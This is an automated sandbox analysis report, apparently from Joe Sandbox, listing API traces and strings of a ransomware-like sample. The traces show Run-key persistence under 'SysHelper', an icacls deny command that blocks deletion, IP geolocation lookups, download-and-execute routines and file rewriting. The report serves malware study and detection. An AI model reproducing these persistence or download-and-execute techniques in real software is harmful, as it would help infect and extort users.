                                                                                                        • _memset.LIBCMT ref: 00F1EBB4
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F1EBC8
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EBDA
                                                                                                        • _sprintf.LIBCMT ref: 00F1EBF4
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00F1EC44
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00F1EC4F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                        • String ID: %.2X
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph (legend: Executed / Not Executed)
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F1E67F
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: RtlAllocateHeap.NTDLL(00840000,00000000,00000001,00000001,?,?,?,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30CA5
                                                                                                        • _malloc.LIBCMT ref: 00F1E68B
                                                                                                        • _wprintf.LIBCMT ref: 00F1E69E
                                                                                                        • _free.LIBCMT ref: 00F1E6A4
                                                                                                          • Part of subcall function 00F30BED: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3507F,00000000,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30C01
                                                                                                          • Part of subcall function 00F30BED: GetLastError.KERNEL32(00000000,?,00F3507F,00000000,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30C13
                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00F1E6B9
                                                                                                        • _free.LIBCMT ref: 00F1E6C5
                                                                                                        • _malloc.LIBCMT ref: 00F1E6CD
                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00F1E6E0
                                                                                                        • _sprintf.LIBCMT ref: 00F1E720
                                                                                                        • _wprintf.LIBCMT ref: 00F1E732
                                                                                                        • _wprintf.LIBCMT ref: 00F1E73C
                                                                                                        • _free.LIBCMT ref: 00F1E745
                                                                                                        Strings
                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00F1E71A
                                                                                                        • Address: %s, mac: %s, xrefs: 00F1E72D
                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 00F1E699
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph (legend: Executed / Not Executed)
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                        • String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph (legend: Executed / Not Executed)
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D12
                                                                                                        • _memset.LIBCMT ref: 00F21D3B
                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00F21D63
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D6C
                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00F21DD6
                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00F21E48
                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00F21E99
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00F21EA5
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F21EB4
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00F21EBF
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F21ECE
                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 00F21EDB
                                                                                                        • UuidCreate.RPCRT4(?), ref: 00F21EFC
                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 00F21F14
                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 00F21F64
                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 00F21F83
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F21F8E
                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 00F2202D
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F22036
                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00F2204C
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00F2206E
                                                                                                        • _memset.LIBCMT ref: 00F22090
                                                                                                        • lstrcpyW.KERNEL32(?,010102FC), ref: 00F220AA
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F220C0
                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 00F220CE
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F220D7
                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 00F220F3
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F220FC
                                                                                                        • _memset.LIBCMT ref: 00F22120
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00F22146
                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 00F22158
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F2216D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                        • Opcode ID: 858227395a33e650d5413132bf5359c15b3904280ca94534aeb4261b51c5fb49
                                                                                                        • Instruction ID: 960151772c1c3069d62a638938a4d60ece35dfc946b48dd513811153b9e4b5d3
                                                                                                        • Opcode Fuzzy Hash: 858227395a33e650d5413132bf5359c15b3904280ca94534aeb4261b51c5fb49
                                                                                                        • Instruction Fuzzy Hash: 0DE17C71D0022EABDF24DBA0DD49BEEB7B9BF04304F10416AE505E6190EB746A84EB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph (entry block f211c0-f2121d; graph rendering not preserved)
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00F2120F
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00F21228
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F2123D
                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00F21277
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 00F212B1
                                                                                                        • _memset.LIBCMT ref: 00F212C8
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00F21301
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00F21314
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F2131B
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00F21349
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00F21381
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F21388
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 00F213E6
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00F21409
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00F21417
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F2141E
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00F21471
                                                                                                        • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00F21491
                                                                                                        • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 00F214CF
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 00F2159D
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00F215D0
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00F215F8
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00F21649
                                                                                                        • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F2166B
                                                                                                        • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F21678
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00F2168D
                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F216D6
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F216EB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                        • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                        • API String ID: 254274740-1186676987
                                                                                                        • Opcode ID: a1c203fb46b1dddbab9d495f5b8da5d7af11d8366111620da2878ddb44f3afe6
                                                                                                        • Instruction ID: 8336ddefcd9389f25a3ad47220e3de83b26ab2c7ebae3bf79098632229e97dc7
                                                                                                        • Opcode Fuzzy Hash: a1c203fb46b1dddbab9d495f5b8da5d7af11d8366111620da2878ddb44f3afe6
                                                                                                        • Instruction Fuzzy Hash: B822FE71D00229EFEB10EBA4EC85BEEB7B9FF04310F104159F515A7291DB385A44EBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph (entry block f2dbd0-f2dcea; graph rendering not preserved)
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F1ECB0: _strtok.LIBCMT ref: 00F1ED66
                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll), ref: 00F2DCF5
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 00F2DD01
                                                                                                          • Part of subcall function 00F23C40: _memset.LIBCMT ref: 00F23C83
                                                                                                        • UuidCreate.RPCRT4(?), ref: 00F2DD3C
                                                                                                        • UuidToStringA.RPCRT4(?,?), ref: 00F2DD57
                                                                                                        • RpcStringFreeA.RPCRT4(00000000), ref: 00F2DDB4
                                                                                                        • PathAppendA.SHLWAPI(?,00000000), ref: 00F2DDD3
                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 00F2DDDC
                                                                                                        • _memset.LIBCMT ref: 00F2DEE7
                                                                                                        • InternetOpenA.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F2DEFC
                                                                                                          • Part of subcall function 00F22900: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00F22966
                                                                                                        • _wcsstr.LIBCMT ref: 00F2DF50
                                                                                                        • InternetOpenUrlA.WININET(00000000,00000000), ref: 00F2E07B
                                                                                                          • Part of subcall function 00F1DD40: _wcsstr.LIBCMT ref: 00F1DD8D
                                                                                                          • Part of subcall function 00F1DD40: _wcsstr.LIBCMT ref: 00F1DDB6
                                                                                                          • Part of subcall function 00F1DD40: _memset.LIBCMT ref: 00F1DDE4
                                                                                                          • Part of subcall function 00F1DD40: lstrlenW.KERNEL32(?), ref: 00F1DE0A
                                                                                                          • Part of subcall function 00F1DD40: gethostbyname.WS2_32(01010134), ref: 00F1DEA7
                                                                                                        • _memmove.LIBCMT ref: 00F2DFDD
                                                                                                        • HttpQueryInfoW.WININET(00000000,20000013,?,00000000,00000000), ref: 00F2E10D
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2E229
                                                                                                        • PathAppendA.SHLWAPI(?,?), ref: 00F2E23F
                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 00F2E288
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F2E2A0
                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00F2E2C7
                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00F2E2FB
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F2E317
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E324
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00F2E32A
                                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 00F2E34D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$File$CloseCreateHandle_memset_wcsstr$AppendOpenPathStringUuid$AddressByteCharDirectoryExecuteFreeHttpInfoLibraryLoadMultiPointerProcQueryReadShellWideWrite_memmove_strtokgethostbynamelstrcpylstrlen
                                                                                                        • String ID: $run$.bit/$Microsoft Internet Explorer$SHGetFolderPathA$Shell32.dll
                                                                                                        • API String ID: 1843630811-800396732
                                                                                                        • Opcode ID: 7108e9f923937423c07c22a77306b4f26d5ce00ba6f5330f325700be41074b66
                                                                                                        • Instruction ID: edf47ad896b3fb7a688f478406a40978039086b1eb43c482cd0543e5f6a1cd28
                                                                                                        • Opcode Fuzzy Hash: 7108e9f923937423c07c22a77306b4f26d5ce00ba6f5330f325700be41074b66
                                                                                                        • Instruction Fuzzy Hash: 1832CC70508391DBE730DF24DC09B9BBBE5AF81318F24091DF5898B292D7B69508DBA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
                                                                                                        APIs
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F22235
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 00F22240
                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 00F22248
                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00F22256
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00F2226A
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00F22275
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00F22280
                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00F22291
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00F2229F
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00F222AA
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00F222B5
                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 00F222CD
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00F222FE
                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00F22315
                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 00F2232C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F22347
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                        • Opcode ID: 0f4d5809731cbdbd200076b54e2f5488b73e2f7be5c23efb14af9f688db238fa
                                                                                                        • Instruction ID: 027481fe0bb6f3984bd14ee2f382873231a77a6494f0eccd12d2cbff97a58a63
                                                                                                        • Opcode Fuzzy Hash: 0f4d5809731cbdbd200076b54e2f5488b73e2f7be5c23efb14af9f688db238fa
                                                                                                        • Instruction Fuzzy Hash: 00318D71E0121EBBDB10EFA59C49EAEB7BCEF49314F00406AF544E7150DA789E41EBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM ref: 00F2F15E
                                                                                                        • Sleep.KERNEL32(?), ref: 00F2F185
                                                                                                        • Sleep.KERNEL32(?), ref: 00F2F19D
                                                                                                        • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 00F2F9D0
                                                                                                          • Part of subcall function 00F20A50: GetLogicalDrives.KERNEL32 ref: 00F20A75
                                                                                                          • Part of subcall function 00F20A50: SetErrorMode.KERNEL32(00000001,01010234,00000002), ref: 00F20AE2
                                                                                                          • Part of subcall function 00F20A50: PathFileExistsA.SHLWAPI(?), ref: 00F20AF9
                                                                                                          • Part of subcall function 00F20A50: SetErrorMode.KERNEL32(00000000), ref: 00F20B02
                                                                                                          • Part of subcall function 00F20A50: GetDriveTypeA.KERNEL32(?), ref: 00F20B1B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                        • String ID: C:\
                                                                                                        • API String ID: 3672571082-3404278061
                                                                                                        • Opcode ID: 8de8ebbda8f5b6f0764641484750e9368cf0ad71288220b1c47d128379061dc8
                                                                                                        • Instruction ID: f9a4796f941addbb438b1aa219ba7ebd8029142f99b69a3829e51acdf21761fe
                                                                                                        • Opcode Fuzzy Hash: 8de8ebbda8f5b6f0764641484750e9368cf0ad71288220b1c47d128379061dc8
                                                                                                        • Instruction Fuzzy Hash: E842BF71D103259BDF24DFA8DC85BAEBBF1BF04318F144139E805AB281D779AA09DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F1CF4A
                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F1CF5F
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F1CFA6
                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00F1CFCD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1CFDA
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1CFDD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                        • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                        • API String ID: 1485416377-933853286
                                                                                                        • Opcode ID: e9d53f1c9b567282708b198eeee01ef827ac985c3d6482d49a4efbf28487d0b6
                                                                                                        • Instruction ID: 4a84508e599a688f1c611de8fb0495b32394ec6f8ddce907f6975f1efce63f1e
                                                                                                        • Opcode Fuzzy Hash: e9d53f1c9b567282708b198eeee01ef827ac985c3d6482d49a4efbf28487d0b6
                                                                                                        • Instruction Fuzzy Hash: 9891D371D00259EBEF25CFA0DC45BEEBBB4AF05304F244158E4457B281D7BA5A88EFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
                                                                                                        APIs
                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00F2BB49
                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00F2BBBA
                                                                                                        • _malloc.LIBCMT ref: 00F2BBE4
                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 00F2BBF4
                                                                                                        • _free.LIBCMT ref: 00F2BCD7
                                                                                                          • Part of subcall function 00F21CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D12
                                                                                                          • Part of subcall function 00F21CD0: _memset.LIBCMT ref: 00F21D3B
                                                                                                          • Part of subcall function 00F21CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00F21D63
                                                                                                          • Part of subcall function 00F21CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D6C
                                                                                                          • Part of subcall function 00F21CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00F21DD6
                                                                                                          • Part of subcall function 00F21CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00F21E48
                                                                                                        • IsWindow.USER32(?), ref: 00F2BF69
